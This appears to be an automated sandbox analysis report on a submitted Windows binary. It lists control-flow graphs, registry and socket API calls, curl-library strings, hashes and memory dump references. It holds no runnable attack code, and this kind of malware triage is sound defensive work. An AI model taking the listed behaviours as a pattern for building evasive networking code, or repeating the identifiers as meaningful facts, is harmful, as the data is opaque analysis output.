1007->1008 1013 6c98e1-6c98f0 call 6be2d0 1007->1013 1008->983 1013->1008 1018 6c98f6-6c9905 call 6c63f0 1013->1018 1023 6c990b-6c990f 1018->1023 1024 6c9f66-6c9f7f call 6c5d00 1018->1024 1026 6c9a3f-6c9a5a call 6c6740 call 6c63f0 1023->1026 1024->998 1026->1024 1032 6c9a60-6c9a6e call 6c6d60 1026->1032 1035 6c9a1f-6c9a39 call 6c6840 call 6c63f0 1032->1035 1036 6c9a70-6c9a94 call 6c6200 call 6c67e0 call 6c6320 1032->1036 1035->1024 1035->1026 1047 6c9a16-6c9a19 1036->1047 1048 6c9a96-6c9ac6 call 6bd120 1036->1048 1047->1035 1049 6c9fc1 1047->1049 1054 6c9ac8-6c9adb call 6bd120 1048->1054 1055 6c9ae1-6c9af7 call 6bd190 1048->1055 1051 6c9fc5-6c9ffd call 6c5d00 call 6be2b0 * 2 1049->1051 1051->998 1054->1035 1054->1055 1055->1035 1061 6c9afd-6c9b09 call 6b4fe0 1055->1061 1061->1049 1067 6c9b0f-6c9b29 call 6be730 1061->1067 1072 6c9b2f-6c9b3a call 6c78a0 1067->1072 1073 6c9f84-6c9f88 1067->1073 1072->1073 1080 6c9b40-6c9b54 call 6be760 1072->1080 1075 6c9f95-6c9f99 1073->1075 1077 6c9f9b-6c9f9e 1075->1077 1078 6c9fa0-6c9fb6 call 6bebf0 * 2 1075->1078 1077->1049 1077->1078 1090 6c9fb7-6c9fbe 1078->1090 1086 6c9f8a-6c9f92 1080->1086 1087 6c9b5a-6c9b6e call 6be730 1080->1087 1086->1075 1094 6c9b8c-6c9b97 call 6c63f0 1087->1094 1095 6c9b70-6ca004 1087->1095 1090->1049 1102 6c9b9d-6c9bbf call 6c6740 call 6c63f0 1094->1102 1103 6c9c9a-6c9cab call 6bea00 1094->1103 1099 6ca015-6ca01d 1095->1099 1100 6ca01f-6ca022 1099->1100 1101 6ca024-6ca045 call 6bebf0 * 2 1099->1101 1100->1051 1100->1101 1101->1051 1102->1103 1121 6c9bc5-6c9bda call 6c6d60 1102->1121 1112 6c9f31-6c9f35 1103->1112 1113 6c9cb1-6c9ccd call 6bea00 call 6be960 1103->1113 1116 6c9f37-6c9f3a 1112->1116 1117 6c9f40-6c9f61 call 6bebf0 * 2 1112->1117 1129 6c9cfd-6c9d0e call 6be960 1113->1129 1130 6c9ccf 1113->1130 1116->1035 1116->1117 1117->1035 1121->1103 1132 6c9be0-6c9bf4 call 6c6200 call 6c67e0 1121->1132 1140 6c9d10 1129->1140 1141 6c9d53-6c9d55 1129->1141 1133 6c9cd1-6c9cec call 6be9f0 call 6be4a0 1130->1133 1132->1103 1149 6c9bfa-6c9c0b call 6c6320 1132->1149 1154 6c9cee-6c9cfb call 6be9d0 1133->1154 1155 6c9d47-6c9d51 1133->1155 1144 6c9d12-6c9d2d call 6be9f0 call 6be4a0 1140->1144 1147 6c9e69-6c9e8e call 6bea40 call 6be440 1141->1147 1172 6c9d2f-6c9d3c call 6be9d0 1144->1172 1173 6c9d5a-6c9d6f call 6be960 1144->1173 1168 6c9e94-6c9eaa call 6be3c0 1147->1168 1169 6c9e90-6c9e92 1147->1169 1164 6c9b75-6c9b86 call 6bea00 1149->1164 1165 6c9c11-6c9c1c call 6c7b70 1149->1165 1154->1129 1154->1133 1160 6c9dca-6c9ddb call 6be960 1155->1160 1177 6c9ddd-6c9ddf 1160->1177 1178 6c9e2e-6c9e36 1160->1178 1164->1094 1187 6c9f2d 1164->1187 1165->1094 1190 6c9c22-6c9c33 call 6be960 1165->1190 1194 6ca04a-6ca04c 1168->1194 1195 6c9eb0-6c9eb1 1168->1195 1175 6c9eb3-6c9ec4 call 6be9c0 1169->1175 1172->1144 1197 6c9d3e-6c9d42 1172->1197 1200 6c9d71-6c9d73 1173->1200 1201 6c9dc2 1173->1201 1175->1035 1204 6c9eca-6c9ed0 1175->1204 1186 6c9e06-6c9e21 call 6be9f0 call 6be4a0 1177->1186 1183 6c9e3d-6c9e5b call 6bebf0 * 2 1178->1183 1184 6c9e38-6c9e3b 1178->1184 1192 6c9e5e-6c9e67 1183->1192 1184->1183 1184->1192 1227 6c9de1-6c9dee call 6bec80 1186->1227 1228 6c9e23-6c9e2c call 6beac0 1186->1228 1187->1112 1213 6c9c35 1190->1213 1214 6c9c66-6c9c75 call 6c78a0 1190->1214 1192->1147 1192->1175 1207 6ca04e-6ca051 1194->1207 1208 6ca057-6ca070 call 6bebf0 * 2 1194->1208 1195->1175 1197->1147 1202 6c9d9a-6c9db5 call 6be9f0 call 6be4a0 1200->1202 1201->1160 1243 6c9d75-6c9d82 call 6bec80 1202->1243 1244 6c9db7-6c9dc0 call 6beac0 1202->1244 1211 6c9ee5-6c9ef2 call 6be9f0 1204->1211 1207->1049 1207->1208 1208->1090 1211->1035 1236 6c9ef8-6c9f0e call 6be440 1211->1236 1221 6c9c37-6c9c51 call 6be9f0 1213->1221 1232 6c9c7b-6c9c8f call 6be7c0 1214->1232 1233 6ca011 1214->1233 1221->1094 1253 6c9c57-6c9c64 call 6be9d0 1221->1253 1246 6c9df1-6c9e04 call 6be960 1227->1246 1228->1246 1232->1094 1256 6c9c95-6ca00e 1232->1256 1233->1099 1251 6c9f10-6c9f26 call 6be3c0 1236->1251 1252 6c9ed2-6c9edf call 6be9e0 1236->1252 1260 6c9d85-6c9d98 call 6be960 1243->1260 1244->1260 1246->1178 1246->1186 1251->1252 1269 6c9f28 1251->1269 1252->1035 1252->1211 1253->1214 1253->1221 1256->1233 1260->1201 1260->1202 1269->1049
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 006C9946
                                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 006C9974
                                                  • RegCloseKey.KERNELBASE(?), ref: 006C998B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                  • API String ID: 3677997916-615551945
                                                  • Opcode ID: e420a0db2900f3ecb1c2ce562059857324e04336b13ff1a673d7dfe191a33f59
                                                  • Instruction ID: 61fb7175c20372ddc0fe728fc3e172ea1131dc73bcd8482175559045be5d6e28
                                                  • Opcode Fuzzy Hash: e420a0db2900f3ecb1c2ce562059857324e04336b13ff1a673d7dfe191a33f59
                                                  • Instruction Fuzzy Hash: 5A32A7F5904201ABEB51AB20EC46FBB7696EF54314F08443CF80A96352FB32E955C7A7
                                                  Function 00638B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1364 638b50-638b69 1365 638be6 1364->1365 1366 638b6b-638b74 1364->1366 1367 638be9 1365->1367 1368 638b76-638b8d 1366->1368 1369 638beb-638bf2 1366->1369 1367->1369 1370 638bf3-638bfe call 63a550 1368->1370 1371 638b8f-638ba7 call 616e40 1368->1371 1378 638de4-638def 1370->1378 1379 638c04-638c08 1370->1379 1376 638cd9-638d16 SleepEx 1371->1376 1377 638bad-638baf 1371->1377 1398 638d22 1376->1398 1399 638d18-638d20 1376->1399 1382 638ca6-638cb0 1377->1382 1383 638bb5-638bb9 1377->1383 1380 638df5-638e19 call 63a150 1378->1380 1381 638e8c-638e95 1378->1381 1384 638c0e-638c1d 1379->1384 1385 638dbd-638dc3 1379->1385 1420 638e1b-638e26 1380->1420 1421 638e88 1380->1421 1390 638f00-638f06 1381->1390 1391 638e97-638e9c 1381->1391 1382->1376 1386 638cb2-638cb8 1382->1386 1383->1369 1388 638bbb-638bc2 1383->1388 1392 638c35-638c48 call 63a150 1384->1392 1393 638c1f-638c34 connect 1384->1393 1385->1367 1394 638cbe-638cd4 call 63b180 1386->1394 1395 638ddc-638dde 1386->1395 1388->1369 1397 638bc4-638bcc 1388->1397 1390->1369 1400 638edf-638eef call 6078b0 1391->1400 1401 638e9e-638eb6 call 612a00 1391->1401 1419 638c4d-638c4f 1392->1419 1393->1392 1394->1378 1395->1367 1395->1378 1405 638bd4-638bda 1397->1405 1406 638bce-638bd2 1397->1406 1408 638d26-638d39 1398->1408 1399->1408 1423 638ef2-638efc 1400->1423 1401->1400 1418 638eb8-638edd call 613410 * 2 1401->1418 1405->1369 1413 638bdc-638be1 1405->1413 1406->1369 1406->1405 1416 638d43-638d61 call 61d8c0 call 63a150 1408->1416 1417 638d3b-638d3d 1408->1417 1422 638dac-638db8 call 6450a0 1413->1422 1439 638d66-638d74 1416->1439 1417->1395 1417->1416 1418->1423 1426 638c51-638c58 1419->1426 1427 638c8e-638c93 1419->1427 1428 638e28-638e2c 1420->1428 1429 638e2e-638e85 call 61d090 call 644fd0 1420->1429 1421->1381 1422->1369 1423->1390 1426->1427 1434 638c5a-638c62 1426->1434 1437 638c99-638c9f 1427->1437 1438 638dc8-638dd9 call 63b100 1427->1438 1428->1421 1428->1429 1429->1421 1440 638c64-638c68 1434->1440 1441 638c6a-638c70 1434->1441 1437->1382 1438->1395 1439->1369 1444 638d7a-638d81 1439->1444 1440->1427 1440->1441 1441->1427 1446 638c72-638c8b call 6450a0 1441->1446 1444->1369 1449 638d87-638d8f 1444->1449 1446->1427 1453 638d91-638d95 1449->1453 1454 638d9b-638da1 1449->1454 1453->1369 1453->1454 1454->1369 1457 638da7 1454->1457 1457->1422
                                                  APIs
                                                  • connect.WS2_32(?,?,00000001), ref: 00638C2F
                                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00638CF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: Sleepconnect
                                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                  • API String ID: 238548546-879669977
                                                  • Opcode ID: b393b17efe70c61a9448854d222c24984615859d1ca3c78c84899a76b0849c85
                                                  • Instruction ID: 8a2f6d8af78e6e2e62fe875c20d860d4beddbb0d3a37444d47fa18bf541a8092
                                                  • Opcode Fuzzy Hash: b393b17efe70c61a9448854d222c24984615859d1ca3c78c84899a76b0849c85
                                                  • Instruction Fuzzy Hash: B2B19D70604306AFDB10CF24C985BE6B7E2AF55314F08856DF85A8B3D2DB71E859C7A1
                                                  Function 00602F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1458 602f17-602f8c call a8eb30 call a8ef20 1463 6031c9-6031cd 1458->1463 1464 602f91-602ff4 call 601619 RegOpenKeyExA 1463->1464 1465 6031d3-6031d6 1463->1465 1468 6031c5 1464->1468 1469 602ffa-60300b 1464->1469 1468->1463 1470 60315c-6031ac RegEnumKeyExA 1469->1470 1471 603010-603083 call 601619 RegOpenKeyExA 1470->1471 1472 6031b2-6031c2 1470->1472 1476 603089-6030d4 RegQueryValueExA 1471->1476 1477 60314e-603152 1471->1477 1472->1468 1478 6030d6-603137 call a8ee00 call a8ee90 call a8ef20 call a8ed30 call a8ef20 call a8d2a0 1476->1478 1479 60313b-60314b RegCloseKey 1476->1479 1477->1470 1478->1479 1479->1477
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: EnumOpen
                                                  • String ID: d
                                                  • API String ID: 3231578192-2564639436
                                                  • Opcode ID: 4309fb31d2f0fbd0aa939075ce9635c6dd8aaea89e5e04905167b25a15e6b0c0
                                                  • Instruction ID: 23e8d20f3694a11fbaf0d189cefcc2ab9118fb591ae7a6f8d62fd02705cec10a
                                                  • Opcode Fuzzy Hash: 4309fb31d2f0fbd0aa939075ce9635c6dd8aaea89e5e04905167b25a15e6b0c0
                                                  • Instruction Fuzzy Hash: E771B6B4904319DFDB10EF68D584B9EBBF0BF85308F1088ADE49897351D7749A898F92
                                                  Function 006076A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1492 6076a0-6076be 1493 6076c0-6076c7 1492->1493 1494 6076e6-6076f2 send 1492->1494 1493->1494 1497 6076c9-6076d1 1493->1497 1495 6076f4-607709 call 6072a0 1494->1495 1496 60775e-607762 1494->1496 1495->1496 1499 6076d3-6076e4 1497->1499 1500 60770b-607759 call 6072a0 call 60cb20 call 988c50 1497->1500 1499->1495 1500->1496
                                                  APIs
                                                  • send.WS2_32(multi.c,?,?,?,N=`,00000000,?,?,006107BF), ref: 006076EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID: LIMIT %s:%d %s reached memlimit$N=`$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                  • API String ID: 2809346765-3352743802
                                                  • Opcode ID: 9e0368b3815b6016ac4243d65471ba1d05d1145ef2b2379eb613fa42cd0cfbc3
                                                  • Instruction ID: 395ae98a0f40513ea208321a158552b1747aecb37a08ce5da88b84a1a4fb6790
                                                  • Opcode Fuzzy Hash: 9e0368b3815b6016ac4243d65471ba1d05d1145ef2b2379eb613fa42cd0cfbc3
                                                  • Instruction Fuzzy Hash: 66113DB5E49344BBD1209B15AC46E273B9DDBD2B78F04094DF804633D1D561FD0182B1
                                                  Function 00639290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1611 639290-6392ed call 6076a0 1614 6393c3-6393ce 1611->1614 1615 6392f3-6392fb 1611->1615 1622 6393d0-6393e1 1614->1622 1623 6393e5-639427 call 61d090 call 644f40 1614->1623 1616 639301-639333 call 61d8c0 call 61d9a0 1615->1616 1617 6393aa-6393af 1615->1617 1635 6393a7 1616->1635 1636 639335-639364 WSAIoctl 1616->1636 1620 639456-639470 1617->1620 1621 6393b5-6393bc 1617->1621 1625 639429-639431 1621->1625 1626 6393be 1621->1626 1622->1621 1627 6393e3 1622->1627 1623->1620 1623->1625 1630 639433-639437 1625->1630 1631 639439-63943f 1625->1631 1626->1620 1627->1620 1630->1620 1630->1631 1631->1620 1634 639441-639453 call 6450a0 1631->1634 1634->1620 1635->1617 1639 639366-63936f 1636->1639 1640 63939b-6393a4 1636->1640 1639->1640 1643 639371-639390 setsockopt 1639->1643 1640->1635 1643->1640 1644 639392-639395 1643->1644 1644->1640
                                                  APIs
                                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0063935D
                                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00639389
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: Ioctlsetsockopt
                                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                  • API String ID: 1903391676-2691795271
                                                  • Opcode ID: 4b1202e06824e6f4e3d8b6c1b403591b4fcef73c937735bf7b382183f2ffbaae
                                                  • Instruction ID: aa995ce547dbd251e567adb28e10def82fb0d2fa695d7de398f59740de6f99e5
                                                  • Opcode Fuzzy Hash: 4b1202e06824e6f4e3d8b6c1b403591b4fcef73c937735bf7b382183f2ffbaae
                                                  • Instruction Fuzzy Hash: 1251D370A00305ABE710DF24C881FAAB7A6FF85314F148529FD488B392E771E991CBA1
                                                  Function 00607770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1645 607770-60778e 1646 607790-607797 1645->1646 1647 6077b6-6077c2 recv 1645->1647 1646->1647 1648 607799-6077a1 1646->1648 1649 6077c4-6077d9 call 6072a0 1647->1649 1650 60782e-607832 1647->1650 1651 6077a3-6077b4 1648->1651 1652 6077db-607829 call 6072a0 call 60cb20 call 988c50 1648->1652 1649->1650 1651->1649 1652->1650
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                  • API String ID: 1507349165-640788491
                                                  • Opcode ID: 70011795f81a223db8b7ac89be665d61abf8c746baaa5ec00df88d6aa9955aed
                                                  • Instruction ID: 34bc61d26e73eca6c0b3c253f770310f4d66b5007ffa99ce311d5cbb4c23b621
                                                  • Opcode Fuzzy Hash: 70011795f81a223db8b7ac89be665d61abf8c746baaa5ec00df88d6aa9955aed
                                                  • Instruction Fuzzy Hash: 88112CB5E493447BD120AB659C4AF273B9DEBD2B68F09055CFC04633D1D671EC1186B2
                                                  Function 006075E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1664 6075e0-6075ed 1665 607607-607629 socket 1664->1665 1666 6075ef-6075f6 1664->1666 1668 60762b-60763c call 6072a0 1665->1668 1669 60763f-607642 1665->1669 1666->1665 1667 6075f8-6075ff 1666->1667 1670 607601-607602 1667->1670 1671 607643-607699 call 6072a0 call 60cb20 call 988c50 1667->1671 1668->1669 1670->1665
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
